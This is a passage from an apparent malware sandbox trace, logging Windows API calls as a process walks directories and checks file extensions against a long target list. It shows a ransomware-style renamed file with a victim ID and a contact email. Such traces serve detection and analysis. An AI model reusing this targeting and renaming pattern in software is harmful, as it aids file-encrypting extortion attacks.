4 [0034.904] lstrcmpiW (lpString1=".ai6", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".ai7") returned 4 [0034.904] lstrcmpiW (lpString1=".ai7", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".ai8") returned 4 [0034.904] lstrcmpiW (lpString1=".ai8", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".anim") returned 5 [0034.904] lstrcmpiW (lpString1=".anim", lpString2="].php") returned -1 [0034.904] lstrlenW (lpString=".arw") returned 4 [0034.904] lstrcmpiW (lpString1=".arw", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".as") returned 3 [0034.904] lstrcmpiW (lpString1=".as", lpString2="php") returned -1 [0034.904] lstrlenW (lpString=".asa") returned 4 [0034.904] lstrcmpiW (lpString1=".asa", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".asc") returned 4 [0034.904] lstrcmpiW (lpString1=".asc", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".ascx") returned 5 [0034.904] lstrcmpiW (lpString1=".ascx", lpString2="].php") returned -1 [0034.904] lstrlenW (lpString=".asm") returned 4 [0034.904] lstrcmpiW (lpString1=".asm", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".asmx") returned 5 [0034.904] lstrcmpiW (lpString1=".asmx", lpString2="].php") returned -1 [0034.904] lstrlenW (lpString=".asp") returned 4 [0034.904] lstrcmpiW (lpString1=".asp", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".aspx") returned 5 [0034.904] lstrcmpiW (lpString1=".aspx", lpString2="].php") returned -1 [0034.904] lstrlenW (lpString=".asr") returned 4 [0034.904] lstrcmpiW (lpString1=".asr", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".asx") returned 4 [0034.904] lstrcmpiW (lpString1=".asx", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".avi") returned 4 [0034.904] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".avs") returned 4 [0034.904] lstrcmpiW (lpString1=".avs", lpString2=".php") returned -1 [0034.904] lstrlenW (lpString=".backup") returned 7 [0034.905] lstrcmpiW (lpString1=".backup", lpString2="om].php") returned -1 [0034.905] lstrlenW (lpString=".bak") returned 4 [0034.905] lstrcmpiW (lpString1=".bak", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".bay") returned 4 [0034.905] lstrcmpiW (lpString1=".bay", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".bd") returned 3 [0034.905] lstrcmpiW (lpString1=".bd", lpString2="php") returned -1 [0034.905] lstrlenW (lpString=".bin") returned 4 [0034.905] lstrcmpiW (lpString1=".bin", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".bmp") returned 4 [0034.905] lstrcmpiW (lpString1=".bmp", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".bz2") returned 4 [0034.905] lstrcmpiW (lpString1=".bz2", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".c") returned 2 [0034.905] lstrcmpiW (lpString1=".c", lpString2="hp") returned -1 [0034.905] lstrlenW (lpString=".cdr") returned 4 [0034.905] lstrcmpiW (lpString1=".cdr", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".cer") returned 4 [0034.905] lstrcmpiW (lpString1=".cer", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".cf") returned 3 [0034.905] lstrcmpiW (lpString1=".cf", lpString2="php") returned -1 [0034.905] lstrlenW (lpString=".cfc") returned 4 [0034.905] lstrcmpiW (lpString1=".cfc", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".cfm") returned 4 [0034.905] lstrcmpiW (lpString1=".cfm", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".cfml") returned 5 [0034.905] lstrcmpiW (lpString1=".cfml", lpString2="].php") returned -1 [0034.905] lstrlenW (lpString=".cfu") returned 4 [0034.905] lstrcmpiW (lpString1=".cfu", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".chm") returned 4 [0034.905] lstrcmpiW (lpString1=".chm", lpString2=".php") returned -1 [0034.905] lstrlenW (lpString=".cin") returned 4 [0034.905] lstrcmpiW (lpString1=".cin", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".class") returned 6 [0034.906] lstrcmpiW (lpString1=".class", lpString2="m].php") returned -1 [0034.906] lstrlenW (lpString=".clx") returned 4 [0034.906] lstrcmpiW (lpString1=".clx", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".config") returned 7 [0034.906] lstrcmpiW (lpString1=".config", lpString2="om].php") returned -1 [0034.906] lstrlenW (lpString=".cpp") returned 4 [0034.906] lstrcmpiW (lpString1=".cpp", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".cr2") returned 4 [0034.906] lstrcmpiW (lpString1=".cr2", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".crt") returned 4 [0034.906] lstrcmpiW (lpString1=".crt", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".crw") returned 4 [0034.906] lstrcmpiW (lpString1=".crw", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".cs") returned 3 [0034.906] lstrcmpiW (lpString1=".cs", lpString2="php") returned -1 [0034.906] lstrlenW (lpString=".css") returned 4 [0034.906] lstrcmpiW (lpString1=".css", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".csv") returned 4 [0034.906] lstrcmpiW (lpString1=".csv", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".cub") returned 4 [0034.906] lstrcmpiW (lpString1=".cub", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".dae") returned 4 [0034.906] lstrcmpiW (lpString1=".dae", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".dat") returned 4 [0034.906] lstrcmpiW (lpString1=".dat", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".db") returned 3 [0034.906] lstrcmpiW (lpString1=".db", lpString2="php") returned -1 [0034.906] lstrlenW (lpString=".dbf") returned 4 [0034.906] lstrcmpiW (lpString1=".dbf", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".dbx") returned 4 [0034.906] lstrcmpiW (lpString1=".dbx", lpString2=".php") returned -1 [0034.906] lstrlenW (lpString=".dc3") returned 4 [0034.906] lstrcmpiW (lpString1=".dc3", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".dcm") returned 4 [0034.907] lstrcmpiW (lpString1=".dcm", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".dcr") returned 4 [0034.907] lstrcmpiW (lpString1=".dcr", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".der") returned 4 [0034.907] lstrcmpiW (lpString1=".der", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".dib") returned 4 [0034.907] lstrcmpiW (lpString1=".dib", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".dic") returned 4 [0034.907] lstrcmpiW (lpString1=".dic", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".dif") returned 4 [0034.907] lstrcmpiW (lpString1=".dif", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".divx") returned 5 [0034.907] lstrcmpiW (lpString1=".divx", lpString2="].php") returned -1 [0034.907] lstrlenW (lpString=".djvu") returned 5 [0034.907] lstrcmpiW (lpString1=".djvu", lpString2="].php") returned -1 [0034.907] lstrlenW (lpString=".dng") returned 4 [0034.907] lstrcmpiW (lpString1=".dng", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".doc") returned 4 [0034.907] lstrcmpiW (lpString1=".doc", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".docm") returned 5 [0034.907] lstrcmpiW (lpString1=".docm", lpString2="].php") returned -1 [0034.907] lstrlenW (lpString=".docx") returned 5 [0034.907] lstrcmpiW (lpString1=".docx", lpString2="].php") returned -1 [0034.907] lstrlenW (lpString=".dot") returned 4 [0034.907] lstrcmpiW (lpString1=".dot", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".dotm") returned 5 [0034.907] lstrcmpiW (lpString1=".dotm", lpString2="].php") returned -1 [0034.907] lstrlenW (lpString=".dotx") returned 5 [0034.907] lstrcmpiW (lpString1=".dotx", lpString2="].php") returned -1 [0034.907] lstrlenW (lpString=".dpx") returned 4 [0034.907] lstrcmpiW (lpString1=".dpx", lpString2=".php") returned -1 [0034.907] lstrlenW (lpString=".dqy") returned 4 [0034.908] lstrcmpiW (lpString1=".dqy", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".dsn") returned 4 [0034.908] lstrcmpiW (lpString1=".dsn", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".dt") returned 3 [0034.908] lstrcmpiW (lpString1=".dt", lpString2="php") returned -1 [0034.908] lstrlenW (lpString=".dtd") returned 4 [0034.908] lstrcmpiW (lpString1=".dtd", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".dwg") returned 4 [0034.908] lstrcmpiW (lpString1=".dwg", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".dwt") returned 4 [0034.908] lstrcmpiW (lpString1=".dwt", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".dx") returned 3 [0034.908] lstrcmpiW (lpString1=".dx", lpString2="php") returned -1 [0034.908] lstrlenW (lpString=".dxf") returned 4 [0034.908] lstrcmpiW (lpString1=".dxf", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".edml") returned 5 [0034.908] lstrcmpiW (lpString1=".edml", lpString2="].php") returned -1 [0034.908] lstrlenW (lpString=".efd") returned 4 [0034.908] lstrcmpiW (lpString1=".efd", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".elf") returned 4 [0034.908] lstrcmpiW (lpString1=".elf", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".emf") returned 4 [0034.908] lstrcmpiW (lpString1=".emf", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".emz") returned 4 [0034.908] lstrcmpiW (lpString1=".emz", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".epf") returned 4 [0034.908] lstrcmpiW (lpString1=".epf", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".eps") returned 4 [0034.908] lstrcmpiW (lpString1=".eps", lpString2=".php") returned -1 [0034.908] lstrlenW (lpString=".epsf") returned 5 [0034.908] lstrcmpiW (lpString1=".epsf", lpString2="].php") returned -1 [0034.908] lstrlenW (lpString=".epsp") returned 5 [0034.908] lstrcmpiW (lpString1=".epsp", lpString2="].php") returned -1 [0034.908] lstrlenW (lpString=".erf") returned 4 [0034.909] lstrcmpiW (lpString1=".erf", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".exr") returned 4 [0034.909] lstrcmpiW (lpString1=".exr", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".f4v") returned 4 [0034.909] lstrcmpiW (lpString1=".f4v", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".fido") returned 5 [0034.909] lstrcmpiW (lpString1=".fido", lpString2="].php") returned -1 [0034.909] lstrlenW (lpString=".flm") returned 4 [0034.909] lstrcmpiW (lpString1=".flm", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".flv") returned 4 [0034.909] lstrcmpiW (lpString1=".flv", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".frm") returned 4 [0034.909] lstrcmpiW (lpString1=".frm", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".fxg") returned 4 [0034.909] lstrcmpiW (lpString1=".fxg", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".geo") returned 4 [0034.909] lstrcmpiW (lpString1=".geo", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".gif") returned 4 [0034.909] lstrcmpiW (lpString1=".gif", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".grs") returned 4 [0034.909] lstrcmpiW (lpString1=".grs", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".gz") returned 3 [0034.909] lstrcmpiW (lpString1=".gz", lpString2="php") returned -1 [0034.909] lstrlenW (lpString=".h") returned 2 [0034.909] lstrcmpiW (lpString1=".h", lpString2="hp") returned -1 [0034.909] lstrlenW (lpString=".hdr") returned 4 [0034.909] lstrcmpiW (lpString1=".hdr", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".hpp") returned 4 [0034.909] lstrcmpiW (lpString1=".hpp", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".hta") returned 4 [0034.909] lstrcmpiW (lpString1=".hta", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".htc") returned 4 [0034.909] lstrcmpiW (lpString1=".htc", lpString2=".php") returned -1 [0034.909] lstrlenW (lpString=".htm") returned 4 [0034.910] lstrcmpiW (lpString1=".htm", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".html") returned 5 [0034.910] lstrcmpiW (lpString1=".html", lpString2="].php") returned -1 [0034.910] lstrlenW (lpString=".icb") returned 4 [0034.910] lstrcmpiW (lpString1=".icb", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".ics") returned 4 [0034.910] lstrcmpiW (lpString1=".ics", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".iff") returned 4 [0034.910] lstrcmpiW (lpString1=".iff", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".inc") returned 4 [0034.910] lstrcmpiW (lpString1=".inc", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".indd") returned 5 [0034.910] lstrcmpiW (lpString1=".indd", lpString2="].php") returned -1 [0034.910] lstrlenW (lpString=".ini") returned 4 [0034.910] lstrcmpiW (lpString1=".ini", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".iqy") returned 4 [0034.910] lstrcmpiW (lpString1=".iqy", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".j2c") returned 4 [0034.910] lstrcmpiW (lpString1=".j2c", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".j2k") returned 4 [0034.910] lstrcmpiW (lpString1=".j2k", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".java") returned 5 [0034.910] lstrcmpiW (lpString1=".java", lpString2="].php") returned -1 [0034.910] lstrlenW (lpString=".jp2") returned 4 [0034.910] lstrcmpiW (lpString1=".jp2", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".jpc") returned 4 [0034.910] lstrcmpiW (lpString1=".jpc", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".jpe") returned 4 [0034.910] lstrcmpiW (lpString1=".jpe", lpString2=".php") returned -1 [0034.910] lstrlenW (lpString=".jpeg") returned 5 [0034.910] lstrcmpiW (lpString1=".jpeg", lpString2="].php") returned -1 [0034.910] lstrlenW (lpString=".jpf") returned 4 [0034.910] lstrcmpiW (lpString1=".jpf", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".jpg") returned 4 [0034.911] lstrcmpiW (lpString1=".jpg", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".jpx") returned 4 [0034.911] lstrcmpiW (lpString1=".jpx", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".js") returned 3 [0034.911] lstrcmpiW (lpString1=".js", lpString2="php") returned -1 [0034.911] lstrlenW (lpString=".jsf") returned 4 [0034.911] lstrcmpiW (lpString1=".jsf", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".json") returned 5 [0034.911] lstrcmpiW (lpString1=".json", lpString2="].php") returned -1 [0034.911] lstrlenW (lpString=".jsp") returned 4 [0034.911] lstrcmpiW (lpString1=".jsp", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".kdc") returned 4 [0034.911] lstrcmpiW (lpString1=".kdc", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".kmz") returned 4 [0034.911] lstrcmpiW (lpString1=".kmz", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".kwm") returned 4 [0034.911] lstrcmpiW (lpString1=".kwm", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".lasso") returned 6 [0034.911] lstrcmpiW (lpString1=".lasso", lpString2="m].php") returned -1 [0034.911] lstrlenW (lpString=".lbi") returned 4 [0034.911] lstrcmpiW (lpString1=".lbi", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".lgf") returned 4 [0034.911] lstrcmpiW (lpString1=".lgf", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".lgp") returned 4 [0034.911] lstrcmpiW (lpString1=".lgp", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".log") returned 4 [0034.911] lstrcmpiW (lpString1=".log", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".m1v") returned 4 [0034.911] lstrcmpiW (lpString1=".m1v", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".m4a") returned 4 [0034.911] lstrcmpiW (lpString1=".m4a", lpString2=".php") returned -1 [0034.911] lstrlenW (lpString=".m4v") returned 4 [0034.911] lstrcmpiW (lpString1=".m4v", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".max") returned 4 [0034.912] lstrcmpiW (lpString1=".max", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".md") returned 3 [0034.912] lstrcmpiW (lpString1=".md", lpString2="php") returned -1 [0034.912] lstrlenW (lpString=".mda") returned 4 [0034.912] lstrcmpiW (lpString1=".mda", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mdb") returned 4 [0034.912] lstrcmpiW (lpString1=".mdb", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mde") returned 4 [0034.912] lstrcmpiW (lpString1=".mde", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mdf") returned 4 [0034.912] lstrcmpiW (lpString1=".mdf", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mdw") returned 4 [0034.912] lstrcmpiW (lpString1=".mdw", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mef") returned 4 [0034.912] lstrcmpiW (lpString1=".mef", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mft") returned 4 [0034.912] lstrcmpiW (lpString1=".mft", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mfw") returned 4 [0034.912] lstrcmpiW (lpString1=".mfw", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mht") returned 4 [0034.912] lstrcmpiW (lpString1=".mht", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mhtml") returned 6 [0034.912] lstrcmpiW (lpString1=".mhtml", lpString2="m].php") returned -1 [0034.912] lstrlenW (lpString=".mka") returned 4 [0034.912] lstrcmpiW (lpString1=".mka", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mkidx") returned 6 [0034.912] lstrcmpiW (lpString1=".mkidx", lpString2="m].php") returned -1 [0034.912] lstrlenW (lpString=".mkv") returned 4 [0034.912] lstrcmpiW (lpString1=".mkv", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mos") returned 4 [0034.912] lstrcmpiW (lpString1=".mos", lpString2=".php") returned -1 [0034.912] lstrlenW (lpString=".mov") returned 4 [0034.913] lstrcmpiW (lpString1=".mov", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".mp3") returned 4 [0034.913] lstrcmpiW (lpString1=".mp3", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".mp4") returned 4 [0034.913] lstrcmpiW (lpString1=".mp4", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".mpeg") returned 5 [0034.913] lstrcmpiW (lpString1=".mpeg", lpString2="].php") returned -1 [0034.913] lstrlenW (lpString=".mpg") returned 4 [0034.913] lstrcmpiW (lpString1=".mpg", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".mpv") returned 4 [0034.913] lstrcmpiW (lpString1=".mpv", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".mrw") returned 4 [0034.913] lstrcmpiW (lpString1=".mrw", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".msg") returned 4 [0034.913] lstrcmpiW (lpString1=".msg", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".mxl") returned 4 [0034.913] lstrcmpiW (lpString1=".mxl", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".myd") returned 4 [0034.913] lstrcmpiW (lpString1=".myd", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".myi") returned 4 [0034.913] lstrcmpiW (lpString1=".myi", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".nef") returned 4 [0034.913] lstrcmpiW (lpString1=".nef", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".nrw") returned 4 [0034.913] lstrcmpiW (lpString1=".nrw", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".obj") returned 4 [0034.913] lstrcmpiW (lpString1=".obj", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".odb") returned 4 [0034.913] lstrcmpiW (lpString1=".odb", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".odc") returned 4 [0034.913] lstrcmpiW (lpString1=".odc", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".odm") returned 4 [0034.913] lstrcmpiW (lpString1=".odm", lpString2=".php") returned -1 [0034.913] lstrlenW (lpString=".odp") returned 4 [0034.914] lstrcmpiW (lpString1=".odp", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".ods") returned 4 [0034.914] lstrcmpiW (lpString1=".ods", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".oft") returned 4 [0034.914] lstrcmpiW (lpString1=".oft", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".one") returned 4 [0034.914] lstrcmpiW (lpString1=".one", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".onepkg") returned 7 [0034.914] lstrcmpiW (lpString1=".onepkg", lpString2="om].php") returned -1 [0034.914] lstrlenW (lpString=".onetoc2") returned 8 [0034.914] lstrcmpiW (lpString1=".onetoc2", lpString2="com].php") returned -1 [0034.914] lstrlenW (lpString=".opt") returned 4 [0034.914] lstrcmpiW (lpString1=".opt", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".oqy") returned 4 [0034.914] lstrcmpiW (lpString1=".oqy", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".orf") returned 4 [0034.914] lstrcmpiW (lpString1=".orf", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".p12") returned 4 [0034.914] lstrcmpiW (lpString1=".p12", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".p7b") returned 4 [0034.914] lstrcmpiW (lpString1=".p7b", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".p7c") returned 4 [0034.914] lstrcmpiW (lpString1=".p7c", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".pam") returned 4 [0034.914] lstrcmpiW (lpString1=".pam", lpString2=".php") returned -1 [0034.914] lstrlenW (lpString=".pbm") returned 4 [0034.914] lstrcmpiW (lpString1=".pbm", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pct") returned 4 [0034.915] lstrcmpiW (lpString1=".pct", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pcx") returned 4 [0034.915] lstrcmpiW (lpString1=".pcx", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pdd") returned 4 [0034.915] lstrcmpiW (lpString1=".pdd", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pdf") returned 4 [0034.915] lstrcmpiW (lpString1=".pdf", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pdp") returned 4 [0034.915] lstrcmpiW (lpString1=".pdp", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pef") returned 4 [0034.915] lstrcmpiW (lpString1=".pef", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pem") returned 4 [0034.915] lstrcmpiW (lpString1=".pem", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pff") returned 4 [0034.915] lstrcmpiW (lpString1=".pff", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pfm") returned 4 [0034.915] lstrcmpiW (lpString1=".pfm", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pfx") returned 4 [0034.915] lstrcmpiW (lpString1=".pfx", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".pgm") returned 4 [0034.915] lstrcmpiW (lpString1=".pgm", lpString2=".php") returned -1 [0034.915] lstrlenW (lpString=".php") returned 4 [0034.915] lstrcmpiW (lpString1=".php", lpString2=".php") returned 0 [0034.915] FindNextFileW (in: hFindFile=0xbf8848, lpFindFileData=0x3faf808 | out: lpFindFileData=0x3faf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3ebb1770, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0x3ebb1770, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ebd78d0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[back_me@foxmail.com].php", cAlternateFileName="DESKTO~1.PHP")) returned 0 [0034.915] FindClose (in: hFindFile=0xbf8848 | out: hFindFile=0xbf8848) returned 1 [0034.916] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4221078 | out: hHeap=0xb10000) returned 1 [0034.916] FindNextFileW (in: hFindFile=0xbf8808, lpFindFileData=0x3fafa84 | out: lpFindFileData=0x3fafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ebb1770, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ebb1770, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0034.916] FindClose (in: hFindFile=0xbf8808 | out: hFindFile=0xbf8808) returned 1 [0034.916] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4210068 | out: hHeap=0xb10000) returned 1 [0034.916] FindNextFileW (in: hFindFile=0xbf87c8, lpFindFileData=0x3fafd00 | out: lpFindFileData=0x3fafd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3ec6fe50, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ec6fe50, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0034.916] lstrlenW (lpString="C:\\Boot") returned 7 [0034.916] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1 [0034.916] lstrlenW (lpString="Boot") returned 4 [0034.916] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1 [0034.916] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x4210068 [0034.916] lstrlenW (lpString="C:\\Boot") returned 7 [0034.916] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x3fafa84 | out: lpFindFileData=0x3fafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3ec6fe50, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ec6fe50, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbf8808 [0034.916] FindNextFileW (in: hFindFile=0xbf8808, lpFindFileData=0x3fafa84 | out: lpFindFileData=0x3fafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3ec6fe50, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ec6fe50, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.916] FindNextFileW (in: hFindFile=0xbf8808, lpFindFileData=0x3fafa84 | out: lpFindFileData=0x3fafa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0034.916] lstrlenW (lpString="BCD") returned 3 [0034.916] lstrlenW (lpString=".1cd") returned 4 [0034.916] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1 [0034.916] lstrlenW (lpString=".3ds") returned 4 [0034.917] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".3fr") returned 4 [0034.917] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".3g2") returned 4 